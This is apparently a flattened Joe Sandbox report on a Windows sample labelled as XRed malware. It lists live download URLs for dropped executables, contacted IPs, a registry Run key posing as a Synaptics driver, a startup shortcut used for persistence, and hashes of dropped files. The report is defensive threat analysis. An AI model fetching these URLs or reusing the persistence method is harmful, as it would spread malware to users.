                                            http://bruplong.oss-accelerate.aliyuncs.com/270/4.exeFfile.exe, 00000000.00000003.1800217674.0000000000751000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1801335644.0000000000751000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://docs.google.com/Synaptics.exe, 00000003.00000002.3537477101.000000000077C000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://bruplong.oss-accelerate.aliyuncs.com/270/1.exeKBfile.exe, 00000000.00000002.1801335644.0000000000706000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1800217674.0000000000706000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1708813251.0000000000705000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.lnkP:wic.exe, 0000000B.00000002.3538860898.000000000169D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://xred.site50.net/syn/SUpdate.iniZSynaptics.exe, 00000003.00000002.3538971140.00000000020C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://bruplong.oss-accelerate.aliyuncs.com/270/wic.exe0file.exe, 00000000.00000003.1800217674.0000000000751000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1801335644.0000000000751000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://xred.site50.net/syn/SUpdate.ini2[1].exe.0.drfalse
                                                		high
                                                http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.exewic.exe, 0000000B.00000002.3538860898.000000000160E000.00000004.00000020.00020000.00000000.sdmp, wic.exe.0.dr, wic[1].exe.0.drfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://bruplong.oss-accelerate.aliyuncs.com/270/1.exe_file.exe, 00000000.00000003.1708813251.0000000000705000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16Synaptics.exe, 00000003.00000002.3538971140.00000000020C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://bruplong.oss-accelerate.aliyuncs.com/270/3.exe1file.exe, 00000000.00000003.1800217674.0000000000751000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1801335644.0000000000751000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://pasy.telefonicas.fyi/wwwww.phpwic.exe, 0000000B.00000003.1814987251.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, cbas.exe, cbas.exe, 00000012.00000002.3537228980.0000000000BD3000.00000002.00000001.01000000.0000001A.sdmp, cbas.exe, 00000012.00000002.3538064091.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, cbas.exe, 00000012.00000000.1920081415.0000000000BD3000.00000002.00000001.01000000.0000001A.sdmp, cbas.exe.11.drfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://bruplong.oss-accelerate.aliyuncs.com/file.exe, 00000000.00000003.1708813251.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://bruplong.oss-accelerate.aliyuncs.com/270/wic.exeGfile.exe, 00000000.00000003.1800217674.0000000000751000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1801335644.0000000000751000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.lnkl:wic.exe, 0000000B.00000002.3538860898.000000000169D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://bruplong.oss-accelerate.aliyuncs.com/270/1.exeNNC:file.exe, 00000000.00000003.1708777064.000000000073F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.lnklwic.exe, 0000000B.00000002.3538860898.000000000169D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.lnkp:wic.exe, 0000000B.00000002.3538860898.000000000169D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.lnkmwic.exe, 0000000B.00000002.3538860898.0000000001681000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.lnkp;wic.exe, 0000000B.00000002.3538860898.000000000169D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://bruplong.oss-accelerate.aliyuncs.com/270/wic.exeUfile.exe, 00000000.00000003.1800217674.0000000000751000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1801335644.0000000000751000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://docs.google.com/-Synaptics.exe, 00000003.00000003.2440072777.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2428940027.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3538251515.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2417824975.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2450428140.00000000007D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:Synaptics.exe, 00000003.00000002.3538971140.00000000020C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://bruplong.oss-accelerate.aliyuncs.com/270/2.exetfile.exe, 00000000.00000003.1800217674.0000000000751000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1801335644.0000000000751000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://drive.usercontent.google.com/Synaptics.exe, 00000003.00000003.2450865873.0000000004805000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3538251515.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2428940027.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2450428140.00000000007C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGSynaptics.exe, 00000003.00000003.2440072777.00000000007E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://xred.site50.net/syn/Synaptics.rar2[1].exe.0.drfalse
                                                              		high
                                                              https://docs.gookSynaptics.exe, 00000003.00000002.3537477101.0000000000761000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.lineageonline.jp/._cache_1.exe, 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://xred.site50.net/syn/SSLLibrary.dll6Synaptics.exe, 00000003.00000002.3538971140.00000000020C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:Synaptics.exe, 00000003.00000002.3538971140.00000000020C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=01.exe, 00000001.00000003.1715627958.0000000002130000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=12[1].exe.0.drfalse
                                                                    		high
                                                                    https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=12[1].exe.0.drfalse
                                                                      		high
                                                                      https://rar.tw)._cache_2.exe, 00000008.00000003.1846288362.0000000000CF2000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1888790338.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1851185608.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000002.1889810525.0000000000D08000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1887786391.0000000000D04000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1850729652.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1846620779.0000000000CFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://bruplong.oss-accelerate.aliyuncs.com/270/2.exe?file.exe, 00000000.00000003.1800217674.0000000000751000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1801335644.0000000000751000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://bruplong.oss-accelerate.aliyuncs.com/270/msslac.dllwic.exe, 0000000B.00000003.1823701424.000000000169D000.00000004.00000020.00020000.00000000.sdmp, wic.exe, 0000000B.00000002.3538860898.000000000169D000.00000004.00000020.00020000.00000000.sdmp, wic.exe.0.dr, wic[1].exe.0.drfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://bruplong.oss-accelerate.aliyuncs.com/270/wic.exesfile.exe, 00000000.00000003.1800217674.0000000000751000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1801335644.0000000000751000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://drive.usercontent.google.com/:Synaptics.exe, 00000003.00000003.2417824975.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2440072777.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2428940027.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2450428140.00000000007C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.lnk&wic.exe, 0000000B.00000002.3538860898.0000000001681000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.exeC:wic.exe, 0000000B.00000000.1799136325.0000000001003000.00000002.00000001.01000000.00000018.sdmp, wic.exe, 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmp, wic.exe.0.dr, wic[1].exe.0.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://bruplong.oss-accelerate.aliyuncs.com/270/wic.exedfile.exe, 00000000.00000003.1800217674.0000000000751000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1801335644.0000000000751000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://xred.site50.net/syn/SSLLibrary.dlh1.exe, 00000001.00000003.1715627958.0000000002130000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://rar.tw/._cache_2.exe, 00000008.00000003.1846288362.0000000000CF2000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1888790338.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1851185608.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1846217794.000000000B992000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1848955591.000000000B9D3000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1838969140.000000000B988000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000002.1889810525.0000000000D08000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1887786391.0000000000D04000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1850992310.000000000B9D3000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1850729652.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1845387925.000000000B991000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1849331101.000000000B9D3000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1846950203.000000000B9D2000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1839631873.000000000B98B000.00000004.00000020.00020000.00000000.sdmp, ._cache_2.exe, 00000008.00000003.1846620779.0000000000CFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://bruplong.oss-accelerate.aliyuncs.com/270/1.exeaafile.exe, 00000000.00000002.1801335644.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1800217674.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1801335644.00000000006DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://bruplong.oss-accelerate.aliyuncs.com/270/cbas.lnk32P;wic.exe, 0000000B.00000002.3538860898.000000000169D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://bruplong.oss-accelerate.aliyuncs.com/270/wic.exewsC:file.exe, 00000000.00000002.1804354538.0000000000785000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1800183063.0000000000781000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://xred.site50.net/syn/SSLLibrary.dll2[1].exe.0.drfalse
                                                                          		high
                                                                          https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl1.exe, 00000001.00000003.1715627958.0000000002130000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://bruplong.oss-accelerate.aliyuncs.com/270/msslac.dllp;wic.exe, 0000000B.00000003.1823701424.000000000169D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            142.250.186.142
                                                                            		docs.google.comUnited States
                                                                            		15169GOOGLEUSfalse
                                                                            47.254.187.72
                                                                            		eu-central-1.oss-acc.aliyuncs.comUnited States
                                                                            		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                                            69.42.215.252
                                                                            		freedns.afraid.orgUnited States
                                                                            		17048AWKNET-LLCUSfalse
                                                                            142.250.185.225
                                                                            		drive.usercontent.google.comUnited States
                                                                            		15169GOOGLEUSfalse

                                                                            General Information

                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1583469
                                                                            Start date and time:2025-01-02 20:33:55 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 9m 30s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Run name:Run with higher sleep bypass
                                                                            Number of analysed new started processes analysed:22
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:file.exe
                                                                            Detection:MAL
                                                                            Classification:mal88.rans.troj.expl.evad.winEXE@26/36@5/4
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HCA Information:
                                                                            • Successful, ratio: 91%
                                                                            • Number of executed functions: 290
                                                                            • Number of non-executed functions: 226
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.113.194.132, 184.28.90.27, 104.208.16.88, 20.190.159.2, 4.175.87.197, 13.107.246.45
                                                                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, onedscolprdcus08.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, azureedge-t-prod.trafficmanager.net, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            • VT rate limit hit for: file.exe

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            19:34:52AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
                                                                            19:35:02AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cbas.lnk

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            69.42.215.252file.exeGet hashmaliciousXRedBrowse
                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                            file.exeGet hashmaliciousXRedBrowse
                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                            file.exeGet hashmaliciousXRedBrowse
                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                            file.exeGet hashmaliciousXRedBrowse
                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                            file.exeGet hashmaliciousXRedBrowse
                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                            file.exeGet hashmaliciousXRedBrowse
                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                            file.exeGet hashmaliciousXRedBrowse
                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                            file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                            Open Purchase Order Summary Details-16-12-2024.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            s-part-0017.t-0009.t-msedge.netfile.exeGet hashmaliciousXRedBrowse
                                                                            • 13.107.246.45
                                                                            file.exeGet hashmaliciousXRedBrowse
                                                                            • 13.107.246.45
                                                                            file.exeGet hashmaliciousXRedBrowse
                                                                            • 13.107.246.45
                                                                            file.exeGet hashmaliciousXRedBrowse
                                                                            • 13.107.246.45
                                                                            file.exeGet hashmaliciousXRedBrowse
                                                                            • 13.107.246.45
                                                                            file.exeGet hashmaliciousXRedBrowse
                                                                            • 13.107.246.45
                                                                            file.exeGet hashmaliciousXmrigBrowse
                                                                            • 13.107.246.45
                                                                            file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                            • 13.107.246.45
                                                                            https://gldkzr-lpqw.buzz/script/ut.js?cb%5C=1735764124690Get hashmaliciousUnknownBrowse
                                                                            • 13.107.246.45
                                                                            eu-central-1.oss-acc.aliyuncs.comhttps://im16.net/Get hashmaliciousUnknownBrowse
                                                                            • 47.254.187.65
                                                                            http://im20.net/Get hashmaliciousUnknownBrowse
                                                                            • 47.254.187.65
                                                                            8v4iWYLvKJ.exeGet hashmaliciousCobaltStrike MetasploitBrowse
                                                                            • 47.254.186.176
                                                                            WhQZ6UbCEY.exeGet hashmaliciousCobaltStrike MetasploitBrowse
                                                                            • 47.254.186.176
                                                                            freedns.afraid.orgfile.exeGet hashmaliciousXRedBrowse
                                                                            • 69.42.215.252
                                                                            file.exeGet hashmaliciousXRedBrowse
                                                                            • 69.42.215.252
                                                                            file.exeGet hashmaliciousXRedBrowse
                                                                            • 69.42.215.252
                                                                            file.exeGet hashmaliciousXRedBrowse
                                                                            • 69.42.215.252
                                                                            file.exeGet hashmaliciousXRedBrowse
                                                                            • 69.42.215.252
                                                                            file.exeGet hashmaliciousXRedBrowse
                                                                            • 69.42.215.252
                                                                            file.exeGet hashmaliciousXRedBrowse
                                                                            • 69.42.215.252
                                                                            file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                            • 69.42.215.252
                                                                            Open Purchase Order Summary Details-16-12-2024.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                            • 69.42.215.252

                                                                            ASNs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdChttps://www.gazeta.ru/politics/news/2024/12/22/24684854.shtmlGet hashmaliciousHTMLPhisherBrowse
                                                                            • 47.253.61.56
                                                                            45631.exeGet hashmaliciousNitolBrowse
                                                                            • 8.217.152.240
                                                                            Hilix.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                            • 8.208.198.92
                                                                            0000000000000000.exeGet hashmaliciousNitolBrowse
                                                                            • 8.217.35.192
                                                                            x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                                                            • 8.211.209.238
                                                                            letsVPN.exeGet hashmaliciousUnknownBrowse
                                                                            • 8.223.56.120
                                                                            letsVPN.exeGet hashmaliciousUnknownBrowse
                                                                            • 8.223.56.120
                                                                            T1#U52a9#U624b1.0.1.exeGet hashmaliciousUnknownBrowse
                                                                            • 8.212.101.195
                                                                            T1#U52a9#U624b1.0.1.exeGet hashmaliciousUnknownBrowse
                                                                            • 8.212.101.195
                                                                            AWKNET-LLCUSfile.exeGet hashmaliciousXRedBrowse
                                                                            • 69.42.215.252
                                                                            file.exeGet hashmaliciousXRedBrowse
                                                                            • 69.42.215.252
                                                                            file.exeGet hashmaliciousXRedBrowse
                                                                            • 69.42.215.252
                                                                            file.exeGet hashmaliciousXRedBrowse
                                                                            • 69.42.215.252
                                                                            file.exeGet hashmaliciousXRedBrowse
                                                                            • 69.42.215.252
                                                                            file.exeGet hashmaliciousXRedBrowse
                                                                            • 69.42.215.252
                                                                            file.exeGet hashmaliciousXRedBrowse
                                                                            • 69.42.215.252
                                                                            file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                            • 69.42.215.252
                                                                            Open Purchase Order Summary Details-16-12-2024.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                            • 69.42.215.252

                                                                            JA3 Fingerprints

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousXRedBrowse
                                                                            • 142.250.186.142
                                                                            • 142.250.185.225
                                                                            file.exeGet hashmaliciousXRedBrowse
                                                                            • 142.250.186.142
                                                                            • 142.250.185.225
                                                                            file.exeGet hashmaliciousXRedBrowse
                                                                            • 142.250.186.142
                                                                            • 142.250.185.225
                                                                            file.exeGet hashmaliciousXRedBrowse
                                                                            • 142.250.186.142
                                                                            • 142.250.185.225
                                                                            file.exeGet hashmaliciousXRedBrowse
                                                                            • 142.250.186.142
                                                                            • 142.250.185.225
                                                                            file.exeGet hashmaliciousXRedBrowse
                                                                            • 142.250.186.142
                                                                            • 142.250.185.225
                                                                            file.exeGet hashmaliciousXRedBrowse
                                                                            • 142.250.186.142
                                                                            • 142.250.185.225
                                                                            file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                            • 142.250.186.142
                                                                            • 142.250.185.225

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Program Files (x86)\1.exe

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):830976
                                                                            Entropy (8bit):6.743094412845321
                                                                            Encrypted:false
                                                                            SSDEEP:12288:xMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9oKXMg14ldj:xnsJ39LyjbJkQFMhmC+6GD9+vF
                                                                            MD5:D026CFE00B08DA14B0A8B7F8860887D7
                                                                            SHA1:08EF96351067F151C19B9CC21605EA018FB43A18
                                                                            SHA-256:E261D309F30DE33A1BA0AA43604DB15F3326C6C8C5B291BDD52F18EA361FE3DD
                                                                            SHA-512:4EF560FF8C6A9A143B9365884C0C999A1FBF5EE638F170AD96ADD2B8B56933038D573CB31F45724A7F1A7B6A35CD2557344BD55C746FC9E9DA38ECD3BDD6361D
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Program Files (x86)\1.exe, Author: Joe Security
                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Program Files (x86)\1.exe, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 100%
                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                            C:\Program Files (x86)\2.exe

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):4645376
                                                                            Entropy (8bit):7.861574505223912
                                                                            Encrypted:false
                                                                            SSDEEP:98304:3nsmtk2aqBB6wcOBfKGSUjkO80kI//gmiklAV+vuGKiSB8zI9ShRbfVdsFWV:3LxiGtJkI/9JQ+vuziSXkfBdko
                                                                            MD5:85A57509DB3E9DFA7B4E451B8243220D
                                                                            SHA1:EE21F93372218959F8B3DCEFAA2C680D857E9E52
                                                                            SHA-256:FCD8D4592CF92FB9F9235A2774CDC8AFF4265D4015269FB7AA995182F8CE26E1
                                                                            SHA-512:104615F2366E06CBBA58A87F2E01D6806C1871C29AF8277E06FCDB385F4AE6BEB37C3BAFD861C320A01303A287A68AE9B5D8640F29A39C21FE38AD9803EBE00D
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Program Files (x86)\2.exe, Author: Joe Security
